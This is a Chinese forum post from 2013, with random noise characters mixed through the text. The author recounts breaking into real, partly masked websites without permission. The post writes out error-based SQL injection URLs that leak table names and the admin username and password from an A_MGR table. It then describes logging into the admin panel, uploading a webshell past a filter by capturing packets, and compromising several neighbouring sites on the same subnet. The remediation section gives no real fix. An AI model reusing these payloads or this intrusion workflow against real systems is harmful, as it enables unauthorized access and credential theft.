发现一个注入点0 A5 S0 N( X( B
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
0 L" M" l U7 V/ X$ i8 _+ H" i% A: H# X! |+ h1 Y4 n+ U
习惯性的加’having1=1--
, z+ c% h9 ~# L9 F7 | z7 K2 V5 [" N8 ^; a/ e4 J+ t) S5 H3 b! L
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—. H3 E/ f& {- Y8 L5 Q# X' j
, Z/ A' o9 K0 k3 G8 V+ ?1 z0
8 T% z% W8 P6 s! W. ~
2 k4 G& p, `* U1 D, }+ y( H爆出Diary_A.dl_Title(这时候很激动啊)9 H# S7 J! X/ d
+ ?: y1 G7 L" f, y. j
那么继续
5 C+ w( ~9 ?0 T+ F- ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
" C7 W# S% |& V2 G) b
# d% k4 m3 ?6 R0 p5 _& Q继续,一直爆下去% t, ]9 W6 g7 Q: w9 G3 c
I Z+ V1 w% l2 O$ l- Z/ l爆到几个字段和表段 但是没找到需要的管理用户的字段
" s# q- T5 M; f# N9 D& D( r6 g, E2 ^4 o6 {" K! _2 Z, Z& p+ K% ?
蛋疼了 怎么办 然后去后台登陆页看源码
) z: W$ x# a+ j( f
- M6 j; Y! G4 f8 Y$ q2 d0; S$ e) R3 a3 X
) g3 |) Y4 P* u, hInput name= “ADUID”
1 l) S8 ?/ R( f3 _: k& jInput name= “ADPWD”3 O: B9 J: H/ h/ U6 V7 l
) r3 O# r* Q" Y, Y& G1 I+ U2 U
很幸运 找到了字段那就继续/ m u0 |; C- d0 b
找到之后开始爆用户
. h/ `4 v) l# G' t! U- ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
" e! ~5 C6 i5 P# B2 W- O爆密码! Z/ g" ^" D0 {4 @+ d) X* ^; Y
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
/ i/ ~/ |3 G9 w" `! U1 z3 `测试了下 这个注入点只能爆到文章哪里的表
9 G3 @7 J8 B: Q8 T1 X
( ^6 d3 W( N; V头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了, \. C& {6 I, H
: w; ?5 c4 _8 K A: s- E7 T
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* k% h/ w* `& o8 e* I" T% v5 L( c: o5 T& \/ g
473* L/ U$ u" Z2 s$ u! c
' d1 J7 A; \: r* V# }% u6 N
进后台
9 ^' T0 k6 k2 X* q" H- H" j
0 `/ K* I; d L
/ @! f1 ?, I7 w" @8 X$ }# \( b$ n% m发现几个上传点 有的地方不能上传 而且防止恶意代码5 D9 b6 e, ^/ i9 o p
" l/ |& G, s( k0 Z没办法 各种百度各种找大牛 找到一只好像可以突破的马
8 m( p- ^) x1 f: ]& B1 X
3 v9 ^. y# [$ c& }$ W% {9 |5 b2 |: @8 M' p7 f" x
在系统管理那里直接上传 不过没有显示地址, v6 _1 n9 l$ @% h
8 v+ m" }2 b x
再上传一次 抓包 搞定OK
4 a3 g) y7 V) q
, |9 B6 k! d$ f& {( n1 ]
: ?. Y6 \9 h2 e' }- [5 C0 O7 o9 X" `2 @0 u, Z2 W
472
. {7 N7 ]( x0 @- C1 x5 r" z5 i% u- F% P% ~) S& D& H
晚上不行了 去睡觉。。。2 D7 d6 G$ g! f# `3 ~7 o) `
第二天刚起床 闲的没事做继续日站吧 1 @* G) E* {) l0 x" _! O
+ B" ^8 L) c, i* b# [9 Y找个站 就把这个站的旁c扫了下
5 a5 T" k& ~: S' H
: j. h/ ?, F' c" F/ \) D9 w1 u发现c段也有一个购物站 ,然后还和这个站的模板差不多
/ V/ ]0 B3 E# \; A+ T% J( v8 ~, C+ s; R
就找到会员登录口测试8 V0 n: c; Z+ X7 W$ ?; \
" E3 m. `% q- m- g% B5 k ~7 g( w'and (select top 1 MGR_UID from A_MGR)>0—) _2 k1 r, G, X, S1 s
果断爆到了 这时候我很激动 通杀
0 b4 ` y) D( _; `6 A- f3 W' s; j1 D2 f: V
再次翻c段' R. G) }+ H) H% \- }( J/ {) W) T
% d9 n. ~. Z( O, u# ~
翻出几个站 都成功拿下
$ D3 c% ~) C1 j6 `+ L( i e; G4 Z# r! m- I+ @$ ^, K
H% ?- |5 p( T% {. Q( e
$ F1 B' { P Z! y% N- q修复方案:" J: }. K3 B4 \" \: ]# M1 b
他们比我专业
4 a/ l4 d$ ?9 i# p1 i( w: v# a* G% Y/ B6 h) c* X% N; Q: w
/ f3 g" [5 [6 l! p
, P$ m9 k. a- T9 ~- [2 W |
发表于 2013-4-4 17:40:38
收藏
支持
反对